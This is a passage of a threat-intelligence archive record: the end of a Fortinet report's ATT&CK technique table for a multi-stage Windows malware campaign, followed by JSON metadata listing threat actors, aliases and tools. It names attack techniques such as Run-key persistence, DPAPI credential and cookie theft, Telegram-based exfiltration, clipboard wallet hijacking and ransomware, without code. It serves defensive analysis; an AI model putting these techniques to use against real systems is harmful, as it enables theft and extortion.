UAC\r\nelevation\r\nPersistence T1547.001\r\nBoot or Logon\r\nAutostart\r\nExecution:\r\nRegistry Run\r\nKeys\r\nAutorun persistence via\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nPersistence T1547.001 Boot or Logon\r\nAutostart\r\nPayloads copied to user Startup directory\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 27 of 29\n\nExecution:\r\nStartup Folder\r\nDiscovery T1082\r\nSystem\r\nInformation\r\nDiscovery\r\nCollection of OS, hardware, domain, and environment\r\ndetails\r\nDiscovery T1057\r\nProcess\r\nDiscovery\r\nEnumeration of running processes to control execution and\r\navoid duplication\r\nCollection T1113\r\nScreen\r\nCapture\r\nPeriodic screenshot capture via TelegramWorker.scr\r\nCollection T1056.001\r\nInput Capture:\r\nClipboard\r\nData\r\nClipboard monitoring for seed phrases and cryptocurrency\r\naddresses\r\nCredential\r\nAccess\r\nT1555\r\nCredentials\r\nfrom Password\r\nStores\r\nExtraction of browser credentials and session data using\r\nDPAPI\r\nCredential\r\nAccess\r\nT1539\r\nSteal Web\r\nSession\r\nCookie\r\nTheft of browser cookies and active session tokens\r\nCredential\r\nAccess\r\nT1098\r\nAccount\r\nManipulation\r\nTelegram Desktop session hijacking via stolen tdata\r\nartifacts\r\nCommand\r\nand Control\r\nT1102.002\r\nWeb Service:\r\nExternal Web\r\nServices\r\nTelegram Bot API used for C2 and data exfiltration\r\nCommand\r\nand Control\r\nT1071.001 Application\r\nLayer\r\nHTTPS-based communication to Telegram and file-hosting\r\nservices\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 28 of 29\n\nProtocol: Web\r\nProtocols\r\nExfiltration T1041\r\nExfiltration\r\nOver C2\r\nChannel\r\nData sent directly through Telegram Bot APIs\r\nExfiltration T1567.002\r\nExfiltration\r\nOver Web\r\nService\r\nUse of third-party file hosting (e.g., GoFile) for large data\r\nsets\r\nImpact T1486\r\nData\r\nEncrypted for\r\nImpact\r\nHakuna Matata–derived ransomware encrypts user files\r\nImpact T1490\r\nInhibit System\r\nRecovery\r\nDeletion of backups, shadow copies, and disabling\r\nWindows Recovery\r\nImpact T1489 Service Stop Termination of services and processes prior to encryption\r\nImpact T1491.001\r\nDefacement:\r\nInternal\r\nWallpaper replacement and ransom messaging\r\nImpact T1499\r\nEndpoint\r\nDenial of\r\nService\r\nWinLocker deployment and file association hijacking\r\nImpact T1565.001\r\nStored Data\r\nManipulation\r\nClipboard hijacking to replace cryptocurrency wallet\r\naddresses\r\nSource: https://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 29 of 29", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign" ], "report_names": [ "inside-a-multi-stage-windows-malware-campaign" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434334, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/77ac3aedd3c7b2af04248a1fa0dadec071c5ebd3.pdf", "text": "https://archive.orkl.eu/77ac3aedd3c7b2af04248a1fa0dadec071c5ebd3.txt", "img": "https://archive.orkl.eu/77ac3aedd3c7b2af04248a1fa0dadec071c5ebd3.jpg" } }